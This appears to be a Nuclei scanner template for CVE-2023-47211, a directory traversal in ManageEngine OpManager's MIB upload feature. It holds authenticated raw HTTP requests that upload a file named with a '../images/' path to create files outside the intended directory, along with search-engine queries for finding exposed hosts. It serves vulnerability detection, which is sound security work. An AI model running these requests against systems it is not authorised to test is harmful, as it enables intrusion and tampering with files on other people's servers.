id: CVE-2023-47211 info: name: ManageEngine OpManager - Directory Traversal author: gy741 severity: high description: | A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851 - https://nvd.nist.gov/vuln/detail/CVE-2023-47211 - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N cvss-score: 8.6 cve-id: CVE-2023-47211 cwe-id: CWE-22 epss-score: 0.00164 epss-percentile: 0.52964 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: zohocorp product: manageengine_firewall_analyzer shodan-query: - "http.title:\"OpManager Plus\"" - http.title:"opmanager plus" fofa-query: title="opmanager plus" google-query: intitle:"opmanager plus" tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp http: - raw: - | POST /two_factor_auth HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded j_username={{username}}&j_password={{password}} - | POST /client/api/json/mibbrowser/uploadMib HTTP/1.1 Host: {{Hostname}} X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}} Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262 -----------------------------372334936941313273904263503262 Content-Disposition: form-data; name="mibFile"; filename="karas.txt" Content-Type: text/plain ../images/karas DEFINITIONS ::= BEGIN IMPORTS enterprises FROM RFC1155-SMI; microsoft OBJECT IDENTIFIER ::= { enterprises 311 } software OBJECT IDENTIFIER ::= { microsoft 1 } systems OBJECT IDENTIFIER ::= { software 1 } os OBJECT IDENTIFIER ::= { systems 3 } windowsNT OBJECT IDENTIFIER ::= { os 1 } windows OBJECT IDENTIFIER ::= { os 2 } workstation OBJECT IDENTIFIER ::= { windowsNT 1 } server OBJECT IDENTIFIER ::= { windowsNT 2 } dc OBJECT IDENTIFIER ::= { windowsNT 3 } END -----------------------------372334936941313273904263503262-- - | POST /client/api/json/mibbrowser/uploadMib HTTP/1.1 Host: {{Hostname}} X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}} Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262 -----------------------------372334936941313273904263503262 Content-Disposition: form-data; name="mibFile"; filename="karas.txt" Content-Type: text/plain ../images/karas DEFINITIONS ::= BEGIN IMPORTS enterprises FROM RFC1155-SMI; microsoft OBJECT IDENTIFIER ::= { enterprises 311 } software OBJECT IDENTIFIER ::= { microsoft 1 } systems OBJECT IDENTIFIER ::= { software 1 } os OBJECT IDENTIFIER ::= { systems 3 } windowsNT OBJECT IDENTIFIER ::= { os 1 } windows OBJECT IDENTIFIER ::= { os 2 } workstation OBJECT IDENTIFIER ::= { windowsNT 1 } server OBJECT IDENTIFIER ::= { windowsNT 2 } dc OBJECT IDENTIFIER ::= { windowsNT 3 } END -----------------------------372334936941313273904263503262-- host-redirects: true max-redirects: 3 matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains(body, "MIBFile with same name already exists")' condition: and extractors: - type: regex name: x_zcsrf_token group: 1 part: header regex: - 'Set-Cookie: opmcsrfcookie=([^;]{50,})' internal: true # digest: 490a0046304402207463b57de77e273b29f35ef339d53a9d18d09b98c545fbfb4a406e3f06c8ce3b0220333ec1305069fb86c3b10d5887bdf0152765f1cf7b49c2907697875e3c10563c:922c64590222798bb761d5b6d8e72950